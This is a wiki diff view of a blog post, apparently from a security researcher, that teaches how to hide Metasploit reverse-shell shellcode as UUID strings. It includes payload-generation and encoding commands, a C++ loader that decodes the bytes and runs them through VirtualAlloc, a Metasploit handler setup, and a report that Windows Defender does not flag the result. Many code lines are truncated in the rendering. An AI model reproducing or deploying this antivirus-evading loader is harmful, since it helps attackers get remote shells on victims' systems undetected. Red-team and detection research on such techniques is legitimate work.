Differences
This shows you the differences between two versions of the page.
Both sides previous revisionPrevious revision | |||
en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen [2025/09/05 10:15] – removed psycore | en:it-security:blog:obfuscation_shellcode_als_uuids_tarnen [2025/09/05 10:16] (current) – old revision restored (2024/09/17 08:20) psycore | ||
---|---|---|---|
Line 1: | Line 1: | ||
+ | {{tag> | ||
+ | ====== Obfuscation: | ||
+ | |||
+ | {{it-security: | ||
+ | |||
+ | In the last [[en: | ||
+ | |||
+ | I came up with the idea of converting the opcodes into a string array, which is filled with [[https:// | ||
+ | |||
+ | ===== Tools ===== | ||
+ | |||
+ | The encoder is part of my shellcode tool [[https:// | ||
+ | |||
+ | ===== Step1: Prepare shellcode ===== | ||
+ | |||
+ | ==== generate ==== | ||
+ | |||
+ | We create a payload without further encryption or encoding. This is usually recognised by Windows Defender. | ||
+ | |||
+ | <code bash> | ||
+ | python shencode.py create -c="-p windows/ | ||
+ | </ | ||
+ | |||
+ | ==== encode ==== | ||
+ | |||
+ | We now encode this payload as UUID strings. | ||
+ | |||
+ | <code bash> | ||
+ | python shencode.py encode -f shell_rev.raw -u | ||
+ | </ | ||
+ | |||
+ | The output now looks something like this: | ||
+ | |||
+ | <code cpp> | ||
+ | [*] try to open file | ||
+ | [+] reading 240906.001 successful! | ||
+ | [*] try to generate UUIDs | ||
+ | std:: | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | ... | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | [+] DONE! | ||
+ | </ | ||
+ | |||
+ | ===== Step 2: Write Inject.cpp ===== | ||
+ | |||
+ | ==== Header ==== | ||
+ | |||
+ | === obfuscated shellcode === | ||
+ | |||
+ | We create a new C++ project and adopt the obfuscated string array that we created previously. | ||
+ | |||
+ | <code cpp> | ||
+ | #include < | ||
+ | #include < | ||
+ | #include < | ||
+ | #include < | ||
+ | #include < | ||
+ | #include < | ||
+ | #pragma warning | ||
+ | |||
+ | std:: | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | ... | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | " | ||
+ | </ | ||
+ | |||
+ | ==== Encoding and injection ==== | ||
+ | |||
+ | === Remove superfluous characters === | ||
+ | |||
+ | Firstly, we need a function to remove the '' | ||
+ | |||
+ | <code cpp> | ||
+ | void removeDashes(std:: | ||
+ | str.erase(std:: | ||
+ | } | ||
+ | </ | ||
+ | |||
+ | === Convert strings to bytes === | ||
+ | |||
+ | The next function converts the UUID strings into executable bytes. The string array is run through piece by piece: | ||
+ | |||
+ | * Remove from '' | ||
+ | * Read 2 characters and return them as bytes | ||
+ | * When the string array has been run through, return the generated byte array to the caller | ||
+ | |||
+ | <code cpp> | ||
+ | std:: | ||
+ | std:: | ||
+ | for (const auto& str : inputStrings) { | ||
+ | std::string cleanStr = str; | ||
+ | removeDashes(cleanStr); | ||
+ | for (size_t i = 0; i < cleanStr.length(); | ||
+ | if (i + 1 < cleanStr.length()) { | ||
+ | std::string byteString = cleanStr.substr(i, | ||
+ | uint8_t byte = static_cast< | ||
+ | byteArray.push_back(byte); | ||
+ | } | ||
+ | } | ||
+ | } | ||
+ | return byteArray; | ||
+ | } | ||
+ | </ | ||
+ | |||
+ | === Main programme === | ||
+ | |||
+ | The main program initialises the variables, calls the conversion function, outputs the bytes to the console and then executes the injection. | ||
+ | |||
+ | To disguise this process somewhat, the function '' | ||
+ | |||
+ | <code cpp> | ||
+ | int main() { | ||
+ | std:: | ||
+ | std:: | ||
+ | unsigned char* Payload = reinterpret_cast< | ||
+ | size_t byteArrayLength = result.size(); | ||
+ | std::cout << "[x] Payload size: " << byteArrayLength << " bytes" << std::endl; | ||
+ | |||
+ | for (size_t i = 0; i < byteArrayLength; | ||
+ | std::cout << std::hex << std:: | ||
+ | if ((i + 1) % 8 == 0) { | ||
+ | std::cout << std::endl; | ||
+ | } | ||
+ | } | ||
+ | |||
+ | void* (*memcpyPtr) (void*, const void*, size_t); | ||
+ | void* exec = VirtualAlloc(0, | ||
+ | memcpyPtr = & | ||
+ | memcpyPtr(exec, | ||
+ | ((void(*)())exec)(); | ||
+ | return 0; | ||
+ | } | ||
+ | </ | ||
+ | |||
+ | ===== Step 3: Test functionality ===== | ||
+ | |||
+ | ==== Metasploit handler ==== | ||
+ | |||
+ | We start a Metasploit handler on the attack system to receive the reverse shell: | ||
+ | |||
+ | <code ruby> | ||
+ | msf6 > use exploit/ | ||
+ | [*] Using configured payload generic/ | ||
+ | |||
+ | msf6 exploit(multi/ | ||
+ | |||
+ | [*] Started reverse TCP handler on 0.0.0.0: | ||
+ | </ | ||
+ | |||
+ | ==== Compile Inject.cpp ==== | ||
+ | |||
+ | We then compile our Inject.cpp as a 64-bit programme. We then copy this to the victim system. After the copying process, the file is not recognised. We scan it once manually with Windows Defender. | ||
+ | |||
+ | {{it-security: | ||
+ | |||
+ | This also looks good. | ||
+ | |||
+ | ==== Execute ==== | ||
+ | |||
+ | We now execute the file and wait for the result. | ||
+ | |||
+ | Unfortunately, | ||
+ | |||
+ | <code stylus> | ||
+ | " | ||
+ | </ | ||
+ | |||
+ | We have generated a raw payload from metasploit. This contains a lot of null bytes and these prevent correct execution. This was quite annoying as my first tests went through. | ||
+ | |||
+ | I repeated the whole process with metasploit' | ||
+ | |||
+ | ===== Conclusion ===== | ||
+ | |||
+ | The UUID obfuscation works and protects the file when accessing the hard drive. After execution, memory protection is required to prevent detection. I will show this in the next part. | ||
+ | |||
+ | ~~DISCUSSION~~ |